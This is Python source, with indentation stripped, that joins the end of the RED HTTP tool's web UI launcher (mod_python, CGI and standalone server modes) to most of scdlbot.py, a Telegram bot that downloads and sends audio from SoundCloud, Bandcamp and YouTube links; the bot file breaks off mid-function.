407: apache.HTTP_PROXY_AUTHENTICATION_REQUIRED,
408: apache.HTTP_REQUEST_TIME_OUT ,
409: apache.HTTP_CONFLICT ,
410: apache.HTTP_GONE ,
411: apache.HTTP_LENGTH_REQUIRED ,
412: apache.HTTP_PRECONDITION_FAILED ,
413: apache.HTTP_REQUEST_ENTITY_TOO_LARGE ,
414: apache.HTTP_REQUEST_URI_TOO_LARGE ,
415: apache.HTTP_UNSUPPORTED_MEDIA_TYPE ,
416: apache.HTTP_RANGE_NOT_SATISFIABLE ,
417: apache.HTTP_EXPECTATION_FAILED ,
422: apache.HTTP_UNPROCESSABLE_ENTITY ,
423: apache.HTTP_LOCKED ,
424: apache.HTTP_FAILED_DEPENDENCY ,
426: apache.HTTP_UPGRADE_REQUIRED ,
500: apache.HTTP_INTERNAL_SERVER_ERROR ,
501: apache.HTTP_NOT_IMPLEMENTED ,
502: apache.HTTP_BAD_GATEWAY ,
503: apache.HTTP_SERVICE_UNAVAILABLE ,
504: apache.HTTP_GATEWAY_TIME_OUT ,
505: apache.HTTP_VERSION_NOT_SUPPORTED ,
506: apache.HTTP_VARIANT_ALSO_VARIES ,
507: apache.HTTP_INSUFFICIENT_STORAGE ,
510: apache.HTTP_NOT_EXTENDED ,
}
r.content_type = "text/html"
def output_hdrs (status, hdrs):
code, phrase = status.split(None, 1)
r.status = status_lookup.get(
int(code),
apache.HTTP_INTERNAL_SERVER_ERROR
)
for hdr in hdrs:
r.headers_out[hdr[0]] = hdr[1]
return r.write, nbhttp.stop
query_string = cgi.parse_qs(r.args or "")
try:
RedWebUi(r.unparsed_uri, r.method, query_string, output_hdrs)
except:
except_handler_factory(r.write)()
return apache.OK
def cgi_main():
"""Run RED as a CGI Script."""
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
base_uri = "http://%s%s%s" % ( # TODO: only supports HTTP
os.environ.get('HTTP_HOST'),
os.environ.get('SCRIPT_NAME'),
os.environ.get('PATH_INFO', '')
)
method = os.environ.get('REQUEST_METHOD')
query_string = cgi.parse_qs(os.environ.get('QUERY_STRING', ""))
def output_hdrs(status, res_hdrs):
sys.stdout.write("Status: %s\n" % status)
for k, v in res_hdrs:
sys.stdout.write("%s: %s\n" % (k, v))
sys.stdout.write("\n")
return sys.stdout.write, nbhttp.stop
try:
RedWebUi(base_uri, method, query_string, output_hdrs)
nbhttp.run()
except:
except_handler_factory(sys.stdout.write)()
def standalone_main(port, static_dir):
"""Run RED as a standalone Web server."""
# load static files
static_files = {}
def static_walker(arg, dirname, names):
for name in names:
try:
path = os.path.join(dirname, name)
if os.path.isdir(path):
continue
uri = os.path.relpath(path, static_dir)
static_files["/static/%s" % uri] = open(path).read()
except IOError:
sys.stderr.write(
"* Problem loading %s\n" % path
)
os.path.walk(static_dir, static_walker, "")
sys.stderr.write("* Static files loaded.\n")
def red_handler (method, uri, req_hdrs, res_start, req_pause):
p_uri = urlsplit(uri)
if static_files.has_key(p_uri.path):
res_body, res_done = res_start("200", "OK", [], nbhttp.dummy)
res_body(static_files[p_uri.path])
res_done(None)
elif p_uri.path == "/":
query_string = cgi.parse_qs(p_uri.query)
def output_hdrs (status, hdrs):
code, phrase = status.split(None, 1)
return res_start(code, phrase, hdrs, nbhttp.dummy)
try:
RedWebUi('/', method, query_string, output_hdrs)
except:
sys.stderr.write("""
*** FATAL ERROR
RED has encountered a fatal error which it really, really can't recover from
in standalone server mode. Details follow.
""")
except_handler_factory(sys.stderr.write)()
sys.stderr.write("\n")
nbhttp.stop()
sys.exit(1)
else:
res_body, res_done = res_start(
"404", "Not Found", [], nbhttp.dummy
)
res_done(None)
return nbhttp.dummy, nbhttp.dummy
nbhttp.Server("", port, red_handler)
try:
nbhttp.run()
except KeyboardInterrupt:
sys.stderr.write("Stopping...\n")
nbhttp.stop()
# TODO: logging
# TODO: extra resources
def standalone_monitor (port, static_dir):
"""Fork a process as a standalone Web server and watch it."""
from multiprocessing import Process
while True:
p = Process(target=standalone_main, args=(port, static_dir))
sys.stderr.write("* Starting RED server...\n")
p.start()
p.join()
# TODO: listen to socket and drop privs
if __name__ == "__main__":
if os.environ.has_key('GATEWAY_INTERFACE'): # CGI
cgi_main()
else:
# standalone server
from optparse import OptionParser
usage = "Usage: %prog [options] port static_dir"
version = "RED version %s" % droid.__version__
option_parser = OptionParser(usage=usage, version=version)
(options, args) = option_parser.parse_args()
if len(args) < 2:
option_parser.error(
"Please specify a port and a static directory."
)
try:
port = int(args[0])
except ValueError:
option_parser.error(
"Port is not an integer."
)
static_dir = args[1]
sys.stderr.write(
"Starting standalone server on PID %s...\n" % os.getpid()
)
# import pdb
# pdb.run('standalone_main(port, static_dir)')
standalone_main(port, static_dir)
# standalone_monitor(port, static_dir)
|
scdlbot.py
|
# -*- coding: utf-8 -*-
"""Main module."""
import gc
import pathlib
import random
import shelve
import shutil
from datetime import datetime
from multiprocessing import Process, Queue
from queue import Empty
from subprocess import PIPE, TimeoutExpired # skipcq: BAN-B404
from urllib.parse import urljoin
from uuid import uuid4
import ffmpeg
from boltons.urlutils import find_all_links
from mutagen.id3 import ID3
from mutagen.mp3 import EasyMP3 as MP3
from prometheus_client import Summary
from telegram import (Message, Chat, ChatMember, MessageEntity, ChatAction, InlineKeyboardMarkup,
InlineKeyboardButton, InlineQueryResultAudio, Update)
from telegram.error import (TelegramError, Unauthorized, BadRequest,
TimedOut, ChatMigrated, NetworkError)
from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, InlineQueryHandler,
CallbackQueryHandler, CallbackContext)
from telegram.ext.dispatcher import run_async
from scdlbot.utils import *
logger = logging.getLogger(__name__)
REQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request')
class ScdlBot:
def __init__(self, tg_bot_token, proxies=None,
store_chat_id=None, no_flood_chat_ids=None, alert_chat_ids=None,
dl_dir="/tmp/scdlbot", dl_timeout=300, max_convert_file_size=80_000_000,
chat_storage_file="/tmp/scdlbotdata", app_url=None,
serve_audio=False, cookies_file=None, source_ips=None):
self.SERVE_AUDIO = serve_audio
if self.SERVE_AUDIO:
self.MAX_TG_FILE_SIZE = 19_000_000
else:
self.MAX_TG_FILE_SIZE = 45_000_000
self.SITES = {
"sc": "soundcloud",
"scapi": "api.soundcloud",
"bc": "bandcamp",
"yt": "youtu",
}
self.APP_URL = app_url
self.DL_TIMEOUT = dl_timeout
self.MAX_CONVERT_FILE_SIZE = max_convert_file_size
self.HELP_TEXT = get_response_text('help.tg.md')
self.SETTINGS_TEXT = get_response_text('settings.tg.md')
self.DL_TIMEOUT_TEXT = get_response_text('dl_timeout.txt').format(self.DL_TIMEOUT // 60)
self.WAIT_BIT_TEXT = [get_response_text('wait_bit.txt'), get_response_text('wait_beat.txt'),
get_response_text('wait_beet.txt')]
self.NO_AUDIO_TEXT = get_response_text('no_audio.txt')
self.NO_URLS_TEXT = get_response_text('no_urls.txt')
self.OLD_MSG_TEXT = get_response_text('old_msg.txt')
self.REGION_RESTRICTION_TEXT = get_response_text('region_restriction.txt')
self.DIRECT_RESTRICTION_TEXT = get_response_text('direct_restriction.txt')
self.LIVE_RESTRICTION_TEXT = get_response_text('live_restriction.txt')
# self.chat_storage = {}
self.chat_storage = shelve.open(chat_storage_file, writeback=True)
for chat_id in (no_flood_chat_ids or []):  # guard against the default None
self.init_chat(chat_id=chat_id, chat_type=Chat.PRIVATE if chat_id > 0 else Chat.SUPERGROUP, flood="no")
self.ALERT_CHAT_IDS = set(alert_chat_ids) if alert_chat_ids else set()
self.STORE_CHAT_ID = store_chat_id
self.DL_DIR = dl_dir
self.COOKIES_DOWNLOAD_FILE = "/tmp/scdlbot_cookies.txt"
self.proxies = proxies
self.source_ips = source_ips
# https://yandex.com/support/music-app-ios/search-and-listen/listening-abroad.html
self.cookies_file = cookies_file
# if sc_auth_token:
# config = configparser.ConfigParser()
# config['scdl'] = {}
# config['scdl']['path'] = self.DL_DIR
# config['scdl']['auth_token'] = sc_auth_token
# config_dir = os.path.join(os.path.expanduser('~'), '.config', 'scdl')
# config_path = os.path.join(config_dir, 'scdl.cfg')
# os.makedirs(config_dir, exist_ok=True)
# with open(config_path, 'w') as config_file:
# config.write(config_file)
self.updater = Updater(token=tg_bot_token, use_context=True)
dispatcher = self.updater.dispatcher
start_command_handler = CommandHandler('start', self.help_command_callback)
dispatcher.add_handler(start_command_handler)
help_command_handler = CommandHandler('help', self.help_command_callback)
dispatcher.add_handler(help_command_handler)
settings_command_handler = CommandHandler('settings', self.settings_command_callback)
dispatcher.add_handler(settings_command_handler)
dl_command_handler = CommandHandler('dl', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(dl_command_handler)
link_command_handler = CommandHandler('link', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(link_command_handler)
message_with_links_handler = MessageHandler(~Filters.update.edited_message &
((Filters.text & (Filters.entity(MessageEntity.URL) |
Filters.entity(MessageEntity.TEXT_LINK))) |
(Filters.caption & (Filters.caption_entity(MessageEntity.URL) |
Filters.caption_entity(
MessageEntity.TEXT_LINK)))),
self.common_command_callback)
dispatcher.add_handler(message_with_links_handler)
button_query_handler = CallbackQueryHandler(self.button_query_callback)
dispatcher.add_handler(button_query_handler)
inline_query_handler = InlineQueryHandler(self.inline_query_callback)
dispatcher.add_handler(inline_query_handler)
unknown_handler = MessageHandler(Filters.command, self.unknown_command_callback)
dispatcher.add_handler(unknown_handler)
dispatcher.add_error_handler(self.error_callback)
self.bot_username = self.updater.bot.get_me().username
self.RANT_TEXT_PRIVATE = "Read /help to learn how to use me"
self.RANT_TEXT_PUBLIC = "[Start me in PM to read help and learn how to use me](t.me/{}?start=1)".format(
self.bot_username)
def start(self, use_webhook=False, webhook_host="127.0.0.1", webhook_port=None, cert_file=None, cert_key_file=None,
url_path="scdlbot"):
if use_webhook:
self.updater.start_webhook(listen=webhook_host,
port=webhook_port,
url_path=url_path)
# cert=cert_file if cert_file else None,
# key=cert_key_file if cert_key_file else None,
# webhook_url=urljoin(app_url, url_path))
self.updater.bot.set_webhook(url=urljoin(self.APP_URL, url_path),
certificate=open(cert_file, 'rb') if cert_file else None)
else:
self.updater.start_polling()
logger.warning("Bot started")
self.updater.idle()
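# A minimal usage sketch (the token env var and the polling choice are assumptions, not part of the source):
#   bot = ScdlBot(tg_bot_token=os.environ["TG_BOT_TOKEN"], dl_dir="/tmp/scdlbot")
#   bot.start(use_webhook=False)  # long polling; pass use_webhook=True plus app_url/webhook_port for webhook mode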
def unknown_command_callback(self, update: Update, context: CallbackContext):
pass
# bot.send_message(chat_id=update.message.chat_id, text="Unknown command")
def error_callback(self, update: Update, context: CallbackContext): # skipcq: PYL-R0201
try:
raise context.error
except Unauthorized:
# remove update.message.chat_id from conversation list
logger.debug('Update {} caused Unauthorized error: {}'.format(update, context.error))
except BadRequest:
# handle malformed requests - read more below!
logger.debug('Update {} caused BadRequest error: {}'.format(update, context.error))
except TimedOut:
# handle slow connection problems
logger.debug('Update {} caused TimedOut error: {}'.format(update, context.error))
except NetworkError:
# handle other connection problems
logger.debug('Update {} caused NetworkError: {}'.format(update, context.error))
except ChatMigrated as e:
# the chat_id of a group has changed, use e.new_chat_id instead
logger.debug('Update {} caused ChatMigrated error: {}'.format(update, context.error))
except TelegramError:
# handle all other telegram related errors
logger.debug('Update {} caused TelegramError: {}'.format(update, context.error))
def init_chat(self, message=None, chat_id=None, chat_type=None, flood="yes"):
if message:
chat_id = str(message.chat_id)
chat_type = message.chat.type
else:
chat_id = str(chat_id)
if chat_id not in self.chat_storage:
self.chat_storage[chat_id] = {}
if "settings" not in self.chat_storage[chat_id]:
self.chat_storage[chat_id]["settings"] = {}
if "mode" not in self.chat_storage[chat_id]["settings"]:
if chat_type == Chat.PRIVATE:
self.chat_storage[chat_id]["settings"]["mode"] = "dl"
else:
self.chat_storage[chat_id]["settings"]["mode"] = "ask"
if "flood" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["flood"] = flood
if "rant_msg_ids" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["rant_msg_ids"] = []
self.chat_storage.sync()
# logger.debug("Current chat_storage: %r", self.chat_storage)
def cleanup_chat(self, chat_id):
chat_msgs = self.chat_storage[str(chat_id)].copy()
for msg_id in chat_msgs:
if msg_id != "settings":
timedelta = datetime.now() - self.chat_storage[str(chat_id)][msg_id]["message"].date
if timedelta.days > 0:
self.chat_storage[str(chat_id)].pop(msg_id)
self.chat_storage.sync()
def rant_and_cleanup(self, bot, chat_id, rant_text, reply_to_message_id=None):
rant_msg = bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=rant_text, parse_mode='Markdown', disable_web_page_preview=True)
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "no":
rant_msgs = self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].copy()
for rant_msg_id in rant_msgs:
try:
bot.delete_message(chat_id=chat_id, message_id=rant_msg_id)
except:
pass
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].remove(rant_msg_id)
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].append(rant_msg.message_id)
self.chat_storage.sync()
def help_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
event_name = "help"
entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
for entity_value in entities.values():
event_name = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
log_and_track(event_name, update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if chat_type != Chat.PRIVATE and flood == "no":
self.rant_and_cleanup(context.bot, chat_id, self.RANT_TEXT_PUBLIC, reply_to_message_id=reply_to_message_id)
else:
context.bot.send_message(chat_id=chat_id, text=self.HELP_TEXT,
parse_mode='Markdown', disable_web_page_preview=True)
def get_wait_text(self):
return random.choice(self.WAIT_BIT_TEXT)
def get_settings_inline_keyboard(self, chat_id):
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
emoji_yes = "✅"
emoji_no = "❌"
button_dl = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "dl" else emoji_no, "Download"]),
callback_data=" ".join(["settings", "dl"]))
button_link = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "link" else emoji_no, "Links"]),
callback_data=" ".join(["settings", "link"]))
button_ask = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "ask" else emoji_no, "Ask"]),
callback_data=" ".join(["settings", "ask"]))
button_flood = InlineKeyboardButton(text=" ".join([emoji_yes if flood == "yes" else emoji_no, "Captions"]),
callback_data=" ".join(["settings", "flood"]))
button_close = InlineKeyboardButton(text=" ".join([emoji_no, "Close settings"]),
callback_data=" ".join(["settings", "close"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_ask], [button_flood, button_close]])
return inline_keyboard
def settings_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
log_and_track("settings")
chat_id = update.message.chat_id
context.bot.send_message(chat_id=chat_id, parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(chat_id),
text=self.SETTINGS_TEXT)
def common_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
command_entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
if not command_entities:
command_passed = False
# if no command then it is just a message and use default mode
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
else:
command_passed = True
# try to determine mode from command
mode = None
for entity_value in command_entities.values():
mode = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
if not mode:
mode = "dl"
if command_passed and not context.args:
rant_text = self.RANT_TEXT_PRIVATE if chat_type == Chat.PRIVATE else self.RANT_TEXT_PUBLIC
rant_text += "\nYou can simply send message with links (to download) OR command as `/{} <links>`.".format(
mode)
self.rant_and_cleanup(context.bot, chat_id, rant_text, reply_to_message_id=reply_to_message_id)
return
# apologize and send TYPING: always in PM and only when it's command in non-PM
apologize = chat_type == Chat.PRIVATE or command_passed
if apologize:
context.bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)
source_ip = None
proxy = None
if self.source_ips:
source_ip = random.choice(self.source_ips)
if self.proxies:
proxy = random.choice(self.proxies)
# TODO find working IP?
urls = self.prepare_urls(msg_or_text=update.message,
direct_urls=(mode == "link"),
source_ip=source_ip, proxy=proxy)
logger.debug(urls)
if not urls:
if apologize:
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_URLS_TEXT, parse_mode='Markdown')
else:
event_name = ("{}_cmd".format(mode)) if command_passed else ("{}_msg".format(mode))
log_and_track(event_name, update.message)
if mode == "dl":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif mode == "link":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif mode == "ask":
# ask: always in PM and only if good urls exist in non-PM
if chat_type == Chat.PRIVATE or "http" in " ".join(urls.values()):
orig_msg_id = str(reply_to_message_id)
self.chat_storage[str(chat_id)][orig_msg_id] = {"message": update.message, "urls": urls,
"source_ip": source_ip, "proxy": proxy}
question = "🎶 links found, what to do?"
button_dl = InlineKeyboardButton(text="✅ Download", callback_data=" ".join([orig_msg_id, "dl"]))
button_link = InlineKeyboardButton(text="❇️ Links",
callback_data=" ".join([orig_msg_id, "link"]))
button_cancel = InlineKeyboardButton(text="❎", callback_data=" ".join([orig_msg_id, "nodl"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_cancel]])
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
reply_markup=inline_keyboard, text=question)
self.cleanup_chat(chat_id)
def button_query_callback(self, update: Update, context: CallbackContext):
btn_msg = update.callback_query.message
self.init_chat(btn_msg)
user_id = update.callback_query.from_user.id
btn_msg_id = btn_msg.message_id
chat = btn_msg.chat
chat_id = chat.id
chat_type = chat.type
orig_msg_id, action = update.callback_query.data.split()
if orig_msg_id == "settings":
if chat_type != Chat.PRIVATE:
chat_member_status = chat.get_member(user_id).status
if chat_member_status not in [ChatMember.ADMINISTRATOR,
ChatMember.CREATOR] and user_id not in self.ALERT_CHAT_IDS:
log_and_track("settings_fail")
update.callback_query.answer(text="You're not chat admin")
return
log_and_track("settings_{}".format(action), btn_msg)
if action == "close":
context.bot.delete_message(chat_id, btn_msg_id)
else:
setting_changed = False
if action in ["dl", "link", "ask"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["mode"]
if action != current_setting:
setting_changed = True
self.chat_storage[str(chat_id)]["settings"]["mode"] = action
elif action in ["flood"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["flood"]
setting_changed = True
self.chat_storage[str(chat_id)]["settings"][action] = "no" if current_setting == "yes" else "yes"
if setting_changed:
self.chat_storage.sync()
update.callback_query.answer(text="Settings changed")
update.callback_query.edit_message_reply_markup(parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(
chat_id))
else:
update.callback_query.answer(text="Settings not changed")
elif orig_msg_id in self.chat_storage[str(chat_id)]:
msg_from_storage = self.chat_storage[str(chat_id)].pop(orig_msg_id)
orig_msg = msg_from_storage["message"]
urls = msg_from_storage["urls"]
source_ip = msg_from_storage["source_ip"]
proxy = msg_from_storage["proxy"]
log_and_track("{}_msg".format(action), orig_msg)
if action == "dl":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=orig_msg_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif action == "link":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
urls = self.prepare_urls(urls.keys(), direct_urls=True, source_ip=source_ip, proxy=proxy)
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=orig_msg_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif action == "nodl":
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
else:
update.callback_query.answer(text=self.OLD_MSG_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
def inline_query_callback(self, update: Update, context: CallbackContext):
log_and_track("link_inline")
inline_query_id = update.inline_query.id
text = update.inline_query.query
results = []
urls = self.prepare_urls(msg_or_text=text, direct_urls=True)
for url in urls:
for direct_url in urls[url].splitlines(): # TODO: fix non-mp3 and allow only sc/bc
logger.debug(direct_url)
results.append(
InlineQueryResultAudio(id=str(uuid4()), audio_url=direct_url, title="FAST_INLINE_DOWNLOAD"))
try:
context.bot.answer_inline_query(inline_query_id, results)
except:
pass
def prepare_urls(self, msg_or_text, direct_urls=False, source_ip=None, proxy=None):
if isinstance(msg_or_text, Message):
urls = []
url_entities = msg_or_text.parse_entities(types=[MessageEntity.URL])
url_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.URL])
url_entities.update(url_caption_entities)
for entity in url_entities:
url_str = url_entities[entity]
logger.debug("Entity URL Parsed: %s", url_str)
if "://" not in url_str:
url_str = "http://{}".format(url_str)
urls.append(URL(url_str))
text_link_entities = msg_or_text.parse_entities(types=[MessageEntity.TEXT_LINK])
text_link_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.TEXT_LINK])
text_link_entities.update(text_link_caption_entities)
for entity in text_link_entities:
url_str = entity.url
logger.debug("Entity Text Link Parsed: %s", url_str)
urls.append(URL(url_str))
else:
urls = find_all_links(msg_or_text, default_scheme="http")
urls_dict = {}
for url in urls:
url_text = url.to_text(True)
#FIXME crutch:
url_text = url_text.replace("m.soundcloud.com", "soundcloud.com")
url_parts_num = len([part for part in url.path_parts if part])
try:
if (
# SoundCloud: tracks, sets and widget pages, no /you/ pages
(self.SITES["sc"] in url.host and (2 <= url_parts_num <= 3 or self.SITES["scapi"] in url_text) and (
not "you" in url.path_parts)) or
# Bandcamp: tracks and albums
(self.SITES["bc"] in url.host and (2 <= url_parts_num <= 2)) or
# YouTube: videos and playlists
(self.SITES["yt"] in url.host and (
"youtu.be" in url.host or "watch" in url.path or "playlist" in url.path))
):
if direct_urls or self.SITES["yt"] in url.host:
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
else:
urls_dict[url_text] = "http"
elif not any((site in url.host for site in self.SITES.values())):
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
except ProcessExecutionError:
logger.debug("youtube-dl get-url failed: %s", url_text)
except URLError as exc:
urls_dict[url_text] = exc.status
return urls_dict
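# Illustrative outcome (URL is an assumption; real values depend on scdl/youtube-dl resolution at runtime):
#   prepare_urls("listen to https://soundcloud.com/artist/track")
#     -> {"https://soundcloud.com/artist/track": "http"}   # known site, direct_urls=False
#   With direct_urls=True the value would instead hold the direct URL(s) returned by get_direct_urls().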
@REQUEST_TIME.time()
@run_async
def download_url_and_send(self, bot, url, direct_urls, chat_id, reply_to_message_id=None,
wait_message_id=None, source_ip=None, proxy=None):
bot.send_chat_action(chat_id=chat_id, action=ChatAction.RECORD_AUDIO)
download_dir = os.path.join(self.DL_DIR, str(uuid4()))
shutil.rmtree(download_dir, ignore_errors=True)
os.makedirs(download_dir)
status = 0
if direct_urls == "direct":
status = -3
elif direct_urls == "country":
status = -4
elif direct_urls == "live":
status = -5
else:
if (self.SITES["sc"] in url and self.SITES["scapi"] not in url) or (self.SITES["bc"] in url):
cmd_name = "scdl"
cmd_args = []
cmd = None
cmd_input = None
if self.SITES["sc"] in url and self.SITES["scapi"] not in url:
cmd_name = "scdl"
cmd_args = (
"-l", url, # URL of track/playlist/user
"-c", # Continue if a music already exist
"--path", download_dir, # Download the music to a custom path
"--onlymp3", # Download only the mp3 file even if the track is Downloadable
"--addtofile", # Add the artist name to the filename if it isn't in the filename already
"--addtimestamp",
# Adds the timestamp of the creation of the track to the title (useful to sort chronologically)
"--no-playlist-folder",
# Download playlist tracks into directory, instead of making a playlist subfolder
"--extract-artist", # Set artist tag from title instead of username
)
cmd = scdl_bin
cmd_input = None
elif self.SITES["bc"] in url:
cmd_name = "bandcamp-dl"
cmd_args = (
"--base-dir", download_dir, # Base location of which all files are downloaded
"--template", "%{track} - %{artist} - %{title} [%{album}]", # Output filename template
"--overwrite", # Overwrite tracks that already exist
"--group", # Use album/track Label as iTunes grouping
"--embed-art", # Embed album art (if available)
"--no-slugify", # Disable slugification of track, album, and artist names
url, # URL of album/track
)
cmd = bandcamp_dl_bin
cmd_input = "yes"
logger.info("%s starts: %s", cmd_name, url)
cmd_proc = cmd[cmd_args].popen(stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)
try:
cmd_stdout, cmd_stderr = cmd_proc.communicate(input=cmd_input, timeout=self.DL_TIMEOUT)
cmd_retcode = cmd_proc.returncode
# TODO listed are common scdl problems for one track with 0 retcode, all its output is always in stderr:
if cmd_retcode or (any(err in cmd_stderr for err in ["Error resolving url", "is not streamable",
"Failed to get item"]) and ".mp3" not in cmd_stderr):
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
logger.info("%s succeeded: %s", cmd_name, url)
status = 1
except TimeoutExpired:
cmd_proc.kill()
logger.info("%s took too much time and dropped: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s failed: %s", cmd_name, url)
if status == 0:
cmd_name = "youtube-dl"
cmd = youtube_dl_func
# TODO: set different ydl_opts for different sites
ydl_opts = {
'format': 'bestaudio/best',
'outtmpl': os.path.join(download_dir, '%(title)s.%(ext)s'),
# default: %(autonumber)s - %(title)s-%(id)s.%(ext)s
'postprocessors': [
{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '128',
},
# {'key': 'EmbedThumbnail',}, {'key': 'FFmpegMetadata',},
],
}
if 'tiktok.com' in url:
ydl_opts['postprocessors'] = []
if proxy:
ydl_opts['proxy'] = proxy
if source_ip:
ydl_opts['source_address'] = source_ip
# https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/YoutubeDL.py#L210
if self.cookies_file:
if "http" in self.cookies_file:
ydl_opts['cookiefile'] = self.COOKIES_DOWNLOAD_FILE
else:
ydl_opts['cookiefile'] = self.cookies_file
queue = Queue()
cmd_args = (url, ydl_opts, queue,)
logger.info("%s starts: %s", cmd_name, url)
cmd_proc = Process(target=cmd, args=cmd_args)
cmd_proc.start()
try:
cmd_retcode, cmd_stderr = queue.get(block=True, timeout=self.DL_TIMEOUT)
cmd_stdout = ""
cmd_proc.join()
if cmd_retcode:
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
# raise cmd_status #TODO: pass and re-raise original Exception?
logger.info("%s succeeded: %s", cmd_name, url)
status = 1
except Empty:
cmd_proc.join(1)
if cmd_proc.is_alive():
cmd_proc.terminate()
logger.info("%s took too much time and dropped: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s failed: %s", cmd_name, url)
status = -2
gc.collect()
if status == -1:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DL_TIMEOUT_TEXT, parse_mode='Markdown')
elif status == -2:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_AUDIO_TEXT, parse_mode='Markdown')
elif status == -3:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DIRECT_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -4:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.REGION_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -5:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.LIVE_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == 1:
file_list = []
for d, dirs, files in os.walk(download_dir):
for file in files:
file_list.append(os.path.join(d, file))
if not file_list:
logger.info("No files in dir: %s", download_dir)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, I couldn't download any files from provided links",
parse_mode='Markdown')
else:
for file in sorted(file_list):
file_name = os.path.split(file)[-1]
file_parts = []
try:
file_parts = self.convert_and_split_audio_file(file)
except FileNotSupportedError as exc:
if not (exc.file_format in ["m3u", "jpg", "jpeg", "png", "finished", "tmp"]):
logger.warning("Unsupported file format: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, downloaded file `{}` is in format I could not yet convert or send".format(
file_name),
parse_mode='Markdown')
except FileTooLargeError as exc:
logger.info("Large file for convert: %s", file_name)
